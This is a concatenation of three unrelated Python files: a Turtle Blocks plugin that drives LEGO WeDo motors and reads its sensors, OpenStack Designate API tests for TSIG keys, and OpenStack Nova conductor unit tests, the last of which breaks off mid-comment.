COLOR_NOTPRESENT = ["#A0A0A0","#808080"]
COLOR_PRESENT = ["#FF6060", "#A06060"]
ERROR_NO_NUMBER = _("The parameter must be an integer, not '%s'")
ERROR_SPEED = _('Motor speed must be an integer between -100 and 100')
WEDO_FOUND = _('WeDo found %s bricks')
WEDO_NOT_FOUND = _('WeDo not found')
INDEX_NOT_FOUND = _('WeDo number %s was not found')
ERROR = -1
class Wedo_plugin(Plugin):
def __init__(self, parent):
Plugin.__init__(self)
self.tw = parent
self.WeDos = []
self.active_wedo = 0
def setup(self):
palette = make_palette('wedo', COLOR_NOTPRESENT, _('Palette of WeDo blocks'),
translation=_('wedo'))
palette.add_block('wedorefresh',
style='basic-style',
label=_('refresh WeDo'),
prim_name='wedorefresh',
help_string=_('Search for a connected WeDo.'))
self.tw.lc.def_prim('wedorefresh', 0,
Primitive(self.refresh))
special_block_colors['wedorefresh'] = COLOR_PRESENT[:]
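# the refresh block always keeps the "present" colours so the user can
# rescan even when no WeDo is connected (see change_color_blocks below)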
palette.add_block('wedoselect',
style='basic-style-1arg',
default = 1,
label=_('WeDo'),
help_string=_('set current WeDo device'),
prim_name = 'wedoselect')
self.tw.lc.def_prim('wedoselect', 1,
Primitive(self.select, arg_descs=[ArgSlot(TYPE_NUMBER)]))
palette.add_block('wedogetcount',
style='box-style',
label=_('number of WeDos'),
help_string=_('number of WeDo devices'),
prim_name = 'wedocount')
self.tw.lc.def_prim('wedocount', 0,
Primitive(self.count, TYPE_INT))
palette.add_block('tilt',
style='box-style',
label=_('tilt'),
help_string=_('tilt sensor output: (-1 == no tilt,\
0 == tilt forward, 3 == tilt back, 1 == tilt left, 2 == tilt right)'),
value_block=True,
prim_name = 'wedotilt')
self.tw.lc.def_prim('wedotilt', 0,
Primitive(self.getTilt, TYPE_INT))
palette.add_block('wedodistance',
style='box-style',
label=_('distance'),
help_string=_('distance sensor output'),
value_block=True,
prim_name = 'wedodistance')
self.tw.lc.def_prim('wedodistance', 0,
Primitive(self.getDistance, TYPE_INT))
palette.add_block('wedosetMotorA',
style = 'basic-style-1arg',
label = _('Motor A'),
default = 30,
prim_name = 'wedosetMotorA',
help_string = _('set the speed for Motor A'))
self.tw.lc.def_prim('wedosetMotorA', 1,
Primitive(self.setMotorA, arg_descs=[ArgSlot(TYPE_NUMBER)]))
palette.add_block('wedosetMotorB',
style = 'basic-style-1arg',
label = _('Motor B'),
default = 30,
prim_name = 'wedosetMotorB',
help_string = _('set the speed for Motor B'))
self.tw.lc.def_prim('wedosetMotorB', 1,
Primitive(self.setMotorB, arg_descs=[ArgSlot(TYPE_NUMBER)]))
############################### Turtle signals ############################
def stop(self):
self.stop_all()
def quit(self):
self.stop_all()
################################# Primitives ##############################
def refresh(self):
self.wedo_find()
self.change_color_blocks()
if self.WeDos:
n = self.count()
self.tw.showlabel('print', WEDO_FOUND % int(n))
else:
self.tw.showlabel('print', WEDO_NOT_FOUND)
def select(self, i):
''' Select current device '''
if self.count() == 0:
raise logoerror(WEDO_NOT_FOUND)
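# Turtle blocks number devices starting at 1; convert to a 0-based
# index into self.WeDos.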
try:
t = int(i)
t = t - 1
except (TypeError, ValueError):
raise logoerror(ERROR_NO_NUMBER % i)
if (t < self.count()) and (t >= 0):
self.active_wedo = t
else:
raise logoerror(INDEX_NOT_FOUND % (t + 1))
def count(self):
''' How many devices are available? '''
return len(self.WeDos)
def getTilt(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
if wedo.tilt == UNAVAILABLE:
return ERROR
return wedo.tilt
else:
return ERROR
def getDistance(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
if wedo.distance == UNAVAILABLE:
return ERROR
return wedo.distance
else:
return ERROR
def getMotorA(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
return wedo.motor_a
else:
return ERROR
def getMotorB(self):
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
return wedo.motor_b
else:
return ERROR
def setMotorA(self, speed):
try:
speed = int(speed)
except (TypeError, ValueError):
raise logoerror(ERROR_SPEED)
if speed > 100 or speed < -100:
raise logoerror(ERROR_SPEED)
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
wedo.motor_a = speed
def setMotorB(self, speed):
try:
speed = int(speed)
except (TypeError, ValueError):
raise logoerror(ERROR_SPEED)
if speed > 100 or speed < -100:
raise logoerror(ERROR_SPEED)
if self.WeDos:
wedo = self.WeDos[self.active_wedo]
wedo.motor_b = speed
############################### Useful functions ##########################
def wedo_find(self):
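# Drop references to any previously discovered devices, then rescan the
# USB bus and rebuild the device list from scratch.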
for wedo in self.WeDos:
wedo.dev = None
self.WeDos = []
self.active_wedo = 0
for dev in scan_for_devices():
w = WeDo(dev)
self.WeDos.append(w)
def stop_all(self):
for wedo in self.WeDos:
wedo.motor_a = 0
wedo.motor_b = 0
def change_color_blocks(self):
index = palette_name_to_index('wedo')
if (index is not None):
wedo_blocks = palette_blocks[index]
for block in self.tw.block_list.list:
if block.type in ['proto', 'block']:
if block.name in wedo_blocks:
if (self.WeDos) or (block.name == 'wedorefresh'):
special_block_colors[block.name] = COLOR_PRESENT[:]
else:
special_block_colors[block.name] = COLOR_NOTPRESENT[:]
block.refresh()
self.tw.regenerate_palette(index)
|
|
# Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Author: Kiall Mac Innes <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
import oslo_messaging as messaging
from oslo_log import log as logging
from designate import exceptions
from designate.central import service as central_service
from designate.tests.test_api.test_v2 import ApiV2TestCase
LOG = logging.getLogger(__name__)
class ApiV2TsigKeysTest(ApiV2TestCase):
def setUp(self):
super(ApiV2TsigKeysTest, self).setUp()
# Set the policy to accept everyone as an admin, as this is an
# admin-only API
self.policy({'admin': '@'})
def test_create_tsigkey(self):
# Create a TSIG Key
fixture = self.get_tsigkey_fixture(0)
response = self.client.post_json('/tsigkeys/', fixture)
# Check the headers are what we expect
self.assertEqual(201, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the generated values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
# Check the supplied values returned are what we expect
self.assertDictContainsSubset(fixture, response.json)
def test_create_tsigkey_validation(self):
# NOTE: The schemas should be tested separately from the API. So we
# don't need to test every variation via the API itself.
# Fetch a fixture
fixture = self.get_tsigkey_fixture(0)
# Add a junk field to the body
fixture['junk'] = 'Junk Field'
# Ensure it fails with a 400
body = fixture
self._assert_exception('invalid_object', 400, self.client.post_json,
'/tsigkeys', body)
def test_create_tsigkey_duplicate(self):
# Prepare a TSIG Key fixture
fixture = self.get_tsigkey_fixture(0)
body = fixture
# Create the first TSIG Key
response = self.client.post_json('/tsigkeys', body)
self.assertEqual(201, response.status_int)
self._assert_exception('duplicate_tsigkey', 409,
self.client.post_json, '/tsigkeys', body)
def test_get_tsigkeys(self):
response = self.client.get('/tsigkeys/')
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('tsigkeys', response.json)
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# We should start with 0 tsigkeys
self.assertEqual(0, len(response.json['tsigkeys']))
data = [self.create_tsigkey(name='tsigkey-%s' % i)
for i in range(1, 10)]
self._assert_paging(data, '/tsigkeys', key='tsigkeys')
self._assert_invalid_paging(data, '/tsigkeys', key='tsigkeys')
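# Patching the central service call to raise MessagingTimeout verifies
# that the API layer maps RPC timeouts to an HTTP 504 response.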
@patch.object(central_service.Service, 'find_tsigkeys',
side_effect=messaging.MessagingTimeout())
def test_get_tsigkeys_timeout(self, _):
self._assert_exception('timeout', 504, self.client.get, '/tsigkeys/')
def test_get_tsigkey(self):
# Create a tsigkey
tsigkey = self.create_tsigkey()
response = self.client.get('/tsigkeys/%s' % tsigkey.id,
headers=[('Accept', 'application/json')])
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the generated values returned are what we expect
self.assertIn('id', response.json)
self.assertIn('created_at', response.json)
self.assertIsNone(response.json['updated_at'])
# Check the supplied values returned are what we expect
self.assertEqual(tsigkey.name, response.json['name'])
self.assertEqual(
tsigkey.algorithm, response.json['algorithm'])
self.assertEqual(tsigkey.secret, response.json['secret'])
self.assertEqual(tsigkey.scope, response.json['scope'])
self.assertEqual(
tsigkey.resource_id, response.json['resource_id'])
def test_get_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.get, '/tsigkeys/%s')
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_get_tsigkey_timeout(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('timeout', 504, self.client.get, url,
headers={'Accept': 'application/json'})
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_get_tsigkey_missing(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('tsigkey_not_found', 404, self.client.get, url,
headers={'Accept': 'application/json'})
def test_update_tsigkey(self):
# Create a TSIG Key
tsigkey = self.create_tsigkey()
# Prepare an update body
body = {'secret': 'prefix-%s' % tsigkey.secret}
response = self.client.patch_json('/tsigkeys/%s' % tsigkey.id, body)
# Check the headers are what we expect
self.assertEqual(200, response.status_int)
self.assertEqual('application/json', response.content_type)
# Check the body structure is what we expect
self.assertIn('links', response.json)
self.assertIn('self', response.json['links'])
# Check the values returned are what we expect
self.assertIn('id', response.json)
self.assertIsNotNone(response.json['updated_at'])
self.assertEqual('prefix-%s' % tsigkey['secret'],
response.json['secret'])
def test_update_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.patch_json, '/tsigkeys/%s')
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.DuplicateTsigKey())
def test_update_tsigkey_duplicate(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 409
self._assert_exception('duplicate_tsigkey', 409,
self.client.patch_json, url, body)
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_update_tsigkey_timeout(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 504
self._assert_exception('timeout', 504, self.client.patch_json,
url, body)
@patch.object(central_service.Service, 'get_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_update_tsigkey_missing(self, _):
# Prepare an update body
body = {'name': 'AnyOldName'}
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
# Ensure it fails with a 404
self._assert_exception('tsigkey_not_found', 404,
self.client.patch_json, url, body)
def test_delete_tsigkey(self):
tsigkey = self.create_tsigkey()
self.client.delete('/tsigkeys/%s' % tsigkey['id'], status=204)
def test_delete_tsigkey_invalid_id(self):
self._assert_invalid_uuid(self.client.delete, '/tsigkeys/%s')
@patch.object(central_service.Service, 'delete_tsigkey',
side_effect=messaging.MessagingTimeout())
def test_delete_tsigkey_timeout(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('timeout', 504, self.client.delete, url)
@patch.object(central_service.Service, 'delete_tsigkey',
side_effect=exceptions.TsigKeyNotFound())
def test_delete_tsigkey_missing(self, _):
url = '/tsigkeys/2fdadfb1-cf96-4259-ac6b-bb7b6d2ff980'
self._assert_exception('tsigkey_not_found', 404, self.client.delete,
url)
|
|
# Copyright 2012 IBM Corp.
# Copyright 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for the conductor service."""
import contextlib
import mock
import mox
from oslo.config import cfg
from oslo import messaging
from oslo.serialization import jsonutils
from oslo.utils import timeutils
from nova.api.ec2 import ec2utils
from nova.compute import arch
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import conductor
from nova.conductor import api as conductor_api
from nova.conductor import manager as conductor_manager
from nova.conductor import rpcapi as conductor_rpcapi
from nova.conductor.tasks import live_migrate
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception as exc
from nova import notifications
from nova import objects
from nova.objects import base as obj_base
from nova.objects import block_device as block_device_obj
from nova.objects import fields
from nova.objects import quotas as quotas_obj
from nova import quota
from nova import rpc
from nova.scheduler import driver as scheduler_driver
from nova.scheduler import utils as scheduler_utils
from nova import test
from nova.tests import cast_as_call
from nova.tests.compute import test_compute
from nova.tests import fake_block_device
from nova.tests import fake_instance
from nova.tests import fake_notifier
from nova.tests import fake_server_actions
from nova.tests import fake_utils
from nova import utils
CONF = cfg.CONF
CONF.import_opt('report_interval', 'nova.service')
FAKE_IMAGE_REF = 'fake-image-ref'
class FakeContext(context.RequestContext):
def elevated(self):
"""Return a consistent elevated context so we can detect it."""
if not hasattr(self, '_elevated'):
self._elevated = super(FakeContext, self).elevated()
return self._elevated
class _BaseTestCase(object):
def setUp(self):
super(_BaseTestCase, self).setUp()
self.db = None
self.user_id = 'fake'
self.project_id = 'fake'
self.context = FakeContext(self.user_id, self.project_id)
fake_notifier.stub_notifier(self.stubs)
self.addCleanup(fake_notifier.reset)
def fake_deserialize_context(serializer, ctxt_dict):
self.assertEqual(self.context.user_id, ctxt_dict['user_id'])
self.assertEqual(self.context.project_id, ctxt_dict['project_id'])
return self.context
self.stubs.Set(rpc.RequestContextSerializer, 'deserialize_context',
fake_deserialize_context)
fake_utils.stub_out_utils_spawn_n(self.stubs)
def _create_fake_instance(self, params=None, type_name='m1.tiny'):
if not params:
params = {}
inst = {}
inst['vm_state'] = vm_states.ACTIVE
inst['image_ref'] = FAKE_IMAGE_REF
inst['reservation_id'] = 'r-fakeres'
inst['user_id'] = self.user_id
inst['project_id'] = self.project_id
inst['host'] = 'fake_host'
type_id = flavors.get_flavor_by_name(type_name)['id']
inst['instance_type_id'] = type_id
inst['ami_launch_index'] = 0
inst['memory_mb'] = 0
inst['vcpus'] = 0
inst['root_gb'] = 0
inst['ephemeral_gb'] = 0
inst['architecture'] = arch.X86_64
inst['os_type'] = 'Linux'
inst['availability_zone'] = 'fake-az'
inst.update(params)
return db.instance_create(self.context, inst)
def _do_update(self, instance_uuid, **updates):
return self.conductor.instance_update(self.context, instance_uuid,
updates, None)
def test_instance_update(self):
instance = self._create_fake_instance()
new_inst = self._do_update(instance['uuid'],
vm_state=vm_states.STOPPED)
instance = db.instance_get_by_uuid(self.context, instance['uuid'])
self.assertEqual(instance['vm_state'], vm_states.STOPPED)
self.assertEqual(new_inst['vm_state'], instance['vm_state'])
def test_instance_update_invalid_key(self):
# NOTE(danms): the real DB API call ignores invalid keys
if self.db is None:
self.conductor = utils.ExceptionHelper(self.conductor)
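# ExceptionHelper unwraps messaging.ExpectedException so assertRaises
# below sees the original KeyError raised by the manager.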
self.assertRaises(KeyError,
self._do_update, 'any-uuid', foobar=1)
def test_migration_get_in_progress_by_host_and_node(self):
self.mox.StubOutWithMock(db,
'migration_get_in_progress_by_host_and_node')
db.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node').AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.migration_get_in_progress_by_host_and_node(
self.context, 'fake-host', 'fake-node')
self.assertEqual(result, 'fake-result')
def test_aggregate_metadata_get_by_host(self):
self.mox.StubOutWithMock(db, 'aggregate_metadata_get_by_host')
db.aggregate_metadata_get_by_host(self.context, 'host',
'key').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.aggregate_metadata_get_by_host(self.context,
'host', 'key')
self.assertEqual(result, 'result')
def test_bw_usage_update(self):
self.mox.StubOutWithMock(db, 'bw_usage_update')
self.mox.StubOutWithMock(db, 'bw_usage_get')
update_args = (self.context, 'uuid', 'mac', 0, 10, 20, 5, 10, 20)
get_args = (self.context, 'uuid', 0, 'mac')
db.bw_usage_update(*update_args, update_cells=True)
db.bw_usage_get(*get_args).AndReturn('foo')
self.mox.ReplayAll()
result = self.conductor.bw_usage_update(*update_args,
update_cells=True)
self.assertEqual(result, 'foo')
def test_provider_fw_rule_get_all(self):
fake_rules = ['a', 'b', 'c']
self.mox.StubOutWithMock(db, 'provider_fw_rule_get_all')
db.provider_fw_rule_get_all(self.context).AndReturn(fake_rules)
self.mox.ReplayAll()
result = self.conductor.provider_fw_rule_get_all(self.context)
self.assertEqual(result, fake_rules)
def test_block_device_mapping_get_all_by_instance(self):
fake_inst = {'uuid': 'fake-uuid'}
self.mox.StubOutWithMock(db,
'block_device_mapping_get_all_by_instance')
db.block_device_mapping_get_all_by_instance(
self.context, fake_inst['uuid']).AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.block_device_mapping_get_all_by_instance(
self.context, fake_inst, legacy=False)
self.assertEqual(result, 'fake-result')
def test_vol_usage_update(self):
self.mox.StubOutWithMock(db, 'vol_usage_update')
self.mox.StubOutWithMock(compute_utils, 'usage_volume_info')
fake_inst = {'uuid': 'fake-uuid',
'project_id': 'fake-project',
'user_id': 'fake-user',
'availability_zone': 'fake-az',
}
db.vol_usage_update(self.context, 'fake-vol', 22, 33, 44, 55,
fake_inst['uuid'],
fake_inst['project_id'],
fake_inst['user_id'],
fake_inst['availability_zone'],
False).AndReturn('fake-usage')
compute_utils.usage_volume_info('fake-usage').AndReturn('fake-info')
self.mox.ReplayAll()
self.conductor.vol_usage_update(self.context, 'fake-vol',
22, 33, 44, 55, fake_inst, None, False)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
msg = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('conductor.%s' % self.conductor_manager.host,
msg.publisher_id)
self.assertEqual('volume.usage', msg.event_type)
self.assertEqual('INFO', msg.priority)
self.assertEqual('fake-info', msg.payload)
def test_compute_node_create(self):
self.mox.StubOutWithMock(db, 'compute_node_create')
db.compute_node_create(self.context, 'fake-values').AndReturn(
'fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_create(self.context,
'fake-values')
self.assertEqual(result, 'fake-result')
def test_compute_node_update(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_update')
db.compute_node_update(self.context, node['id'], {'fake': 'values'}).\
AndReturn('fake-result')
self.mox.ReplayAll()
result = self.conductor.compute_node_update(self.context, node,
{'fake': 'values'})
self.assertEqual(result, 'fake-result')
def test_compute_node_delete(self):
node = {'id': 'fake-id'}
self.mox.StubOutWithMock(db, 'compute_node_delete')
db.compute_node_delete(self.context, node['id']).AndReturn(None)
self.mox.ReplayAll()
result = self.conductor.compute_node_delete(self.context, node)
self.assertIsNone(result)
def test_task_log_get(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end', 'host',
'state').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', 'state')
self.assertEqual(result, 'result')
def test_task_log_get_with_no_state(self):
self.mox.StubOutWithMock(db, 'task_log_get')
db.task_log_get(self.context, 'task', 'begin', 'end',
'host', None).AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_get(self.context, 'task', 'begin',
'end', 'host', None)
self.assertEqual(result, 'result')
def test_task_log_begin_task(self):
self.mox.StubOutWithMock(db, 'task_log_begin_task')
db.task_log_begin_task(self.context.elevated(), 'task', 'begin',
'end', 'host', 'items',
'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_begin_task(
self.context, 'task', 'begin', 'end', 'host', 'items', 'message')
self.assertEqual(result, 'result')
def test_task_log_end_task(self):
self.mox.StubOutWithMock(db, 'task_log_end_task')
db.task_log_end_task(self.context.elevated(), 'task', 'begin', 'end',
'host', 'errors', 'message').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.task_log_end_task(
self.context, 'task', 'begin', 'end', 'host', 'errors', 'message')
self.assertEqual(result, 'result')
def test_notify_usage_exists(self):
info = {
'audit_period_beginning': 'start',
'audit_period_ending': 'end',
'bandwidth': 'bw_usage',
'image_meta': {},
'extra': 'info',
}
instance = {
'system_metadata': [],
}
self.mox.StubOutWithMock(notifications, 'audit_period_bounds')
self.mox.StubOutWithMock(notifications, 'bandwidth_usage')
self.mox.StubOutWithMock(compute_utils, 'notify_about_instance_usage')
notifications.audit_period_bounds(False).AndReturn(('start', 'end'))
notifications.bandwidth_usage(instance, 'start', True).AndReturn(
'bw_usage')
notifier = self.conductor_manager.notifier
compute_utils.notify_about_instance_usage(notifier,
self.context, instance,
'exists',
system_metadata={},
extra_usage_info=info)
self.mox.ReplayAll()
self.conductor.notify_usage_exists(self.context, instance, False, True,
system_metadata={},
extra_usage_info=dict(extra='info'))
def test_security_groups_trigger_members_refresh(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_members_refresh')
self.conductor_manager.security_group_api.trigger_members_refresh(
self.context, [1, 2, 3])
self.mox.ReplayAll()
self.conductor.security_groups_trigger_members_refresh(self.context,
[1, 2, 3])
def test_get_ec2_ids(self):
expected = {
'instance-id': 'ec2-inst-id',
'ami-id': 'ec2-ami-id',
'kernel-id': 'ami-kernel-ec2-kernelid',
'ramdisk-id': 'ami-ramdisk-ec2-ramdiskid',
}
inst = {
'uuid': 'fake-uuid',
'kernel_id': 'ec2-kernelid',
'ramdisk_id': 'ec2-ramdiskid',
'image_ref': 'fake-image',
}
self.mox.StubOutWithMock(ec2utils, 'id_to_ec2_inst_id')
self.mox.StubOutWithMock(ec2utils, 'glance_id_to_ec2_id')
self.mox.StubOutWithMock(ec2utils, 'image_type')
ec2utils.id_to_ec2_inst_id(inst['uuid']).AndReturn(
expected['instance-id'])
ec2utils.glance_id_to_ec2_id(self.context,
inst['image_ref']).AndReturn(
expected['ami-id'])
for image_type in ['kernel', 'ramdisk']:
image_id = inst['%s_id' % image_type]
ec2utils.image_type(image_type).AndReturn('ami-' + image_type)
ec2utils.glance_id_to_ec2_id(self.context, image_id,
'ami-' + image_type).AndReturn(
'ami-%s-ec2-%sid' % (image_type, image_type))
self.mox.ReplayAll()
result = self.conductor.get_ec2_ids(self.context, inst)
self.assertEqual(result, expected)
class ConductorTestCase(_BaseTestCase, test.TestCase):
"""Conductor Manager Tests."""
def setUp(self):
super(ConductorTestCase, self).setUp()
self.conductor = conductor_manager.ConductorManager()
self.conductor_manager = self.conductor
def test_instance_get_by_uuid(self):
orig_instance = self._create_fake_instance()
copy_instance = self.conductor.instance_get_by_uuid(
self.context, orig_instance['uuid'], None)
self.assertEqual(orig_instance['name'],
copy_instance['name'])
def test_block_device_mapping_update_or_create(self):
fake_bdm = {'id': 1, 'device_name': 'foo',
'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume'}
fake_bdm = fake_block_device.FakeDbBlockDeviceDict(fake_bdm)
fake_bdm2 = {'id': 1, 'device_name': 'foo2',
'source_type': 'volume', 'volume_id': 'fake-vol-id',
'destination_type': 'volume'}
fake_bdm2 = fake_block_device.FakeDbBlockDeviceDict(fake_bdm2)
cells_rpcapi = self.conductor.cells_rpcapi
self.mox.StubOutWithMock(db, 'block_device_mapping_create')
self.mox.StubOutWithMock(db, 'block_device_mapping_update')
self.mox.StubOutWithMock(db, 'block_device_mapping_update_or_create')
self.mox.StubOutWithMock(cells_rpcapi,
'bdm_update_or_create_at_top')
db.block_device_mapping_create(self.context,
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(
self.context, mox.IsA(block_device_obj.BlockDeviceMapping),
create=True)
db.block_device_mapping_update(self.context, fake_bdm['id'],
fake_bdm).AndReturn(fake_bdm2)
cells_rpcapi.bdm_update_or_create_at_top(
self.context, mox.IsA(block_device_obj.BlockDeviceMapping),
create=False)
self.mox.ReplayAll()
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=True)
self.conductor.block_device_mapping_update_or_create(self.context,
fake_bdm,
create=False)
def test_instance_get_all_by_filters(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None, use_slave=False)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
None, False)
def test_instance_get_all_by_filters_use_slave(self):
filters = {'foo': 'bar'}
self.mox.StubOutWithMock(db, 'instance_get_all_by_filters')
db.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None, use_slave=True)
self.mox.ReplayAll()
self.conductor.instance_get_all_by_filters(self.context, filters,
'fake-key', 'fake-sort',
columns_to_join=None,
use_slave=True)
def test_instance_get_all_by_host(self):
self.mox.StubOutWithMock(db, 'instance_get_all_by_host')
self.mox.StubOutWithMock(db, 'instance_get_all_by_host_and_node')
db.instance_get_all_by_host(self.context.elevated(),
'host', None).AndReturn('result')
db.instance_get_all_by_host_and_node(self.context.elevated(), 'host',
'node').AndReturn('result')
self.mox.ReplayAll()
result = self.conductor.instance_get_all_by_host(self.context, 'host',
None, None)
self.assertEqual(result, 'result')
result = self.conductor.instance_get_all_by_host(self.context, 'host',
'node', None)
self.assertEqual(result, 'result')
def _test_stubbed(self, name, dbargs, condargs,
db_result_listified=False, db_exception=None):
self.mox.StubOutWithMock(db, name)
if db_exception:
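# The expectation is recorded twice because the conductor method is
# called twice below: once to check the messaging.ExpectedException
# wrapper, and once via ExceptionHelper to check the original exception.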
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
getattr(db, name)(self.context, *dbargs).AndRaise(db_exception)
else:
getattr(db, name)(self.context, *dbargs).AndReturn('fake-result')
self.mox.ReplayAll()
if db_exception:
self.assertRaises(messaging.ExpectedException,
self.conductor.service_get_all_by,
self.context, **condargs)
self.conductor = utils.ExceptionHelper(self.conductor)
self.assertRaises(db_exception.__class__,
self.conductor.service_get_all_by,
self.context, **condargs)
else:
result = self.conductor.service_get_all_by(self.context,
**condargs)
if db_result_listified:
self.assertEqual(['fake-result'], result)
else:
self.assertEqual('fake-result', result)
def test_service_get_all(self):
self._test_stubbed('service_get_all', (),
dict(host=None, topic=None, binary=None))
def test_service_get_by_host_and_topic(self):
self._test_stubbed('service_get_by_host_and_topic',
('host', 'topic'),
dict(topic='topic', host='host', binary=None))
def test_service_get_all_by_topic(self):
self._test_stubbed('service_get_all_by_topic',
('topic',),
dict(topic='topic', host=None, binary=None))
def test_service_get_all_by_host(self):
self._test_stubbed('service_get_all_by_host',
('host',),
dict(host='host', topic=None, binary=None))
def test_service_get_by_compute_host(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_result_listified=True)
def test_service_get_by_args(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None))
def test_service_get_by_compute_host_not_found(self):
self._test_stubbed('service_get_by_compute_host',
('host',),
dict(topic='compute', host='host', binary=None),
db_exception=exc.ComputeHostNotFound(host='host'))
def test_service_get_by_args_not_found(self):
self._test_stubbed('service_get_by_args',
('host', 'binary'),
dict(host='host', binary='binary', topic=None),
db_exception=exc.HostBinaryNotFound(binary='binary',
host='host'))
def test_security_groups_trigger_handler(self):
self.mox.StubOutWithMock(self.conductor_manager.security_group_api,
'trigger_handler')
self.conductor_manager.security_group_api.trigger_handler('event',
self.context,
'args')
self.mox.ReplayAll()
self.conductor.security_groups_trigger_handler(self.context,
'event', ['args'])
def _test_object_action(self, is_classmethod, raise_exception):
class TestObject(obj_base.NovaObject):
def foo(self, context, raise_exception=False):
if raise_exception:
raise Exception('test')
else:
return 'test'
@classmethod
def bar(cls, context, raise_exception=False):
if raise_exception:
raise Exception('test')
else:
return 'test'
obj = TestObject()
if is_classmethod:
result = self.conductor.object_class_action(
self.context, TestObject.obj_name(), 'bar', '1.0',
tuple(), {'raise_exception': raise_exception})
else:
updates, result = self.conductor.object_action(
self.context, obj, 'foo', tuple(),
{'raise_exception': raise_exception})
self.assertEqual('test', result)
def test_object_action(self):
self._test_object_action(False, False)
def test_object_action_on_raise(self):
self.assertRaises(messaging.ExpectedException,
self._test_object_action, False, True)
def test_object_class_action(self):
self._test_object_action(True, False)
def test_object_class_action_on_raise(self):
self.assertRaises(messaging.ExpectedException,
self._test_object_action, True, True)
def test_object_action_copies_object(self):
class TestObject(obj_base.NovaObject):
fields = {'dict': fields.DictOfStringsField()}
def touch_dict(self, context):
self.dict['foo'] = 'bar'
self.obj_reset_changes()
obj = TestObject()
obj.dict = {}
obj.obj_reset_changes()
updates, result = self.conductor.object_action(
self.context, obj, 'touch_dict', tuple(), {})
# NOTE(danms): If conductor did not properly copy the object, then
# the new and reference copies of the nested dict object will be
# the same, and thus 'dict' will not be reported as changed
